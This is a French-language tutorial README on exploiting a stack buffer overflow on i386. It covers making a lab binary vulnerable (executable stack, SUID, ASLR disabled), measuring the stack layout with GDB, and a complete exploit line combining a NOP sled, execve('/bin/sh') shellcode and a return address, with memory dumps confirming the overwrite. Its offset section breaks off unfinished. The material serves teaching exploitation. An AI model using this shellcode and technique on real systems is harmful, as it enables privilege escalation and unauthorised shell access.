# Stack Buffer Overflow  

## Introduction  

Ce fichier présente quelques techniques utilisées afin d'exploiter un buffer
overflow.  
Architecture : i386 (programme compilé avec [```-m32```](Makefile#L15))  

## Prérequis  

Le programme pour être vulnérable doit :   
- Utiliser un buffer sans vérifier sa taille  
- Marquer sa pile comme étant exécutable (champ *p_flags*
  de l'en-tête *PT_GNU_STACK* de l'ELF)  
  - Implicitement : avec GCC, l'utilisation de *trampoline* (lors de
    **nested function** par exemple) rend la pile exécutable.  
  - Explicitement :  
    - Soit à l'étape d'assemblage : option ```--execstack```  
    (```--noexecstack``` permet au contraire de préciser que la pile
    n'est pas exécutable)  
    - Soit à l'édition de lien: option [```-z execstack```](Makefile#L45)  
    (```-z noexecstack``` permet au contraire de préciser que la pile
    n'est pas exécutable)  
- Être un programme SUID (***S**et owner **U**ser **ID** up on execution*:
  utilise les droit du propriétaire et non de l'exécutant,
  ```ls -l``` donne ```-rwsr-sr-x``` par exemple)  
  - [```chown root.root <program>```](Makefile#L69) pour modifier le propriétaire
  - [```chmod +s <program>```](Makefile#L70) pour le rendre SUID
- Désactiver ASLR (*Address space layout randomization*), mécanisme qui rend
  aléatoire les adresses logiques et donc impossible de prévoir
  la position logique de la pile puisqu'elle change à chaque exécution.  
  Désactiver ASLR : [```echo 0 | sudo tee /proc/sys/kernel/randomize_va_space```](Makefile#L75)  
  Activer ASLR : [```echo 2 | sudo tee /proc/sys/kernel/randomize_va_space```](Makefile#L78)  


## Principe  

On exécute un programme qui :  
- crée un buffer  
- le remplis de façon à modifier l'adresse de retour de la fonction
  du programme cible qui utilise le buffer vulnérable.  
- exécute (```exec```) le programme vulnérable.  


### Théorie : Taille du buffer  

Taille demandée : 100 octets  
100 octets = 100/4 = 25 mots (mot de 32 bits = 4 octets)  


Il semblerait qu'il faille que le buffer soit aligné sur 16 octets
(commencer à une adresse $a$ telle que $a \% 16 = 0$ et contenir un nombre
de mots multiple de 4).  
Le buffer étant déclaré juste après l'entrée dans la fonction[^abi], se trouvent
sur la pile après les paramètres : 


<img src="img/stack.svg" alt="stack" width="500"/>



| contenu | taille (mots) | taille (octets) |       adresse       |                                     remarque                                     |
| :-----: | :-----------: | :-------------: | :-----------------: | :------------------------------------------------------------------------------: |
|   eip   |       1       |        4        |     0x......xc      |                                                                                  |
|   ebp   |       1       |        4        |     0x......x8      | à moins d'avoir spécifié à gcc le parametre [```-fomit-frame-pointer```](Makefile#L31) |
|   ebx   |       1       |        4        | 0x......x4[^svgebx] |                                                                                  |
| padding |       1       |        4        |     0x......x0      |                                                                                  |
| buffer  |      25       |       100       |     0x......yc      |                     Calcul exacte :  0x......x0 - 0x00000064                     |
| padding |       3       |       12        |     0x......y0      |                                                                                  |

Donc au lieu d'allouer 100 octets pour notre buffer, en comptant le padding
servant à l'alignement, le compilateur en a alloué 116.  
En regardant le code assembleur, on observe bien
```assembly
say_hello:
0x565555ad <+0>:	push   ebp        # Sauvegarde de l'ancienne stack frame
0x565555ae <+1>:	mov    ebp,esp    # Nouvelle stack frame
0x565555b0 <+3>:	push   ebx        # Sauvegarde pour utilisation
0x565555b1 <+4>:	sub    esp,0x74   # 116 octets (100 + padding)
```


[^abi]: D'après l'[ABI (*Application Binary Interface*) du i386](https://github.com/hjl-tools/x86-psABI/wiki/X86-psABI), 
      à l'entrée dans une fonction, la valeur esp+4 est toujours
      un multiple de 16 (le sommet de le pile contient l'adresse de retour
      qui est à une adresse du type *0x.......c*)  

[^svgebx]: ebx est sauvegardé car il est utilisé dans le fonctionnement interne
           de la fonction say_hello.  


### Pratique : Taille et préparation du buffer  

#### Avec GDB  

On trouve la taille minimale de l'argument pour laquelle l'adresse eip
est complètement ecrasée (après quelques étapes, on observe un SEGFAULT car 
le programme a essayé de se rendre à l'adresse qu'on a entrée, ici 0x90909090)  

```bash
gdb ./stack-based_overflow
br say_hello
run `perl -e 'print "\x90"x116'`  # Remplissage jusqu'à overflow
```

On exécute le programme avec un argument **de la taille trouvée** (car
cet argument est recopié dans la pile lors de l'appel de fonction, sa taille 
modifie donc l'adresse du début du buffer) et on observe
la position dans la pile du buffer exploité (On choisit d'observer 32 mots
pour obtenir eip, ebp, ebx, les 25 mots du buffer et les 3 mots de padding,
mais en théorie, seul nous intéresse le début du buffer).  

```bash
gdb ./stack-based_overflow
br 12                             # break right after strcpy
run `perl -e 'print "\x90"x116'`



x/8xw $esp                        # On observe la pile et on y trouve l'adresse
                                  # du premier NOP

              padding     padding     padding   buffer start
                 ↓           ↓           ↓           ↓
0xffffcea0:	0xf7ffc984	0xf7ffc988	0xffffceea	0x90909090
0xffffceb0:	0x90909090	0x90909090	0x90909090	0x90909090
```

Il ne reste plus qu'à bien former l'argument :
- taille à remplir $-$ shellcode $-$ adresse retour = $116-45-4$ = $67$ NOP
- le shellcode = $45$ octets
- l'adresse de retour trouvée précédemment (ici 0xffffceac)

``` bash
./stack-based_overflow `perl -e 'print "\x90"x67 . "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" . "\x8c\xdc\xff\xff"'`
```

On peut vérifier qur tout s'est bien déroulé en observant les 32 premiers mots
(pour obtenir eip, ebp, ebx, les 25 mots du buffer et les 3 mots de padding)
de la pile juste après la copie dans (et pas que) le buffer

```bash
x/32xw $esp                                     buffer start
              padding     padding     padding   (0xffffceac)
                 ↓           ↓           ↓           ↓      
0xffffcea0:	0xf7ffc984	0xf7ffc988	0xffffceea	0x90909090 ⭦   
0xffffceb0:	0x90909090	0x90909090	0x90909090	0x90909090 ←  NOP SLED
0xffffcec0:	0x90909090	0x90909090	0x90909090	0x90909090 ←  (67 bytes = 16.75 words)
0xffffced0:	0x90909090	0x90909090	0x90909090	0x90909090 ⭩ 
0xffffcee0:	0x90909090	0x90909090	0x90909090	0xeb909090 ← first shellcode byte
0xffffcef0:	0x76895e1f	0x88c03108	0x46890746	0x890bb00c
0xffffcf00:	0x084e8df3	0xcd0c568d	0x89db3180	0x80cd40d8 ← buffer end
0xffffcf10:	0xffffdce8	0x69622fff	0x68732f6e	0xffffceac
                ↑            ↑           ↑           ↑
             padding        ebx         ebp         eip
                                 (shellcode end) (pointing NOP)
```

#### A l'aide d'un programme tier  

La localisation exacte du buffer est difficile à connaitre car elle dépend
du compilateur utilisé ainsi que ses options par défaut.
Pour l'estimer, on passe par un autre programme  

programme vulnérable :
- pas de variables locales dans le main
- appel de 1 fonction avec 1 argument (1×4 (arg) + 1×4 (frame pointer) +
  1×4 (adresse de retour) = 12 octets)

  ```assembly
  # say_hello(argv[1]);
  movl  4(%eax), %eax
  addl  $4, %eax
  movl  (%eax), %eax
  subl  $12, %esp  # Ajoute l'argument, le frame pointeur et l'adresse de retour
  pushl %eax
  call  say_hello
  addl  $16, %esp # Dépile après être retourné de la fonction
  ```

- 1 variable locale dans la fonction = 4 octets
- buffer de 100 octets
  
$\to$ Total = 116 octets

programme hack :
- 5 variables locales (5*4 = 20 octets)

$\to$ Total = 20 octets

Donc l'offset est de 


## Remarque : Fonctionnement d'un appel de fonction  

- Empilement des arguments (du dernier au premier)  
- Sauvegarde du program counter (eip)  
- Sauvegarde de la stack frame (ebp = pointeur vers le début de la pile pour
  le contexte courant $\to$ le contexte courant se situe entre ebp qui pointe
  vers le bas du contexte, et esp qui pointe vers le haut du contexte)  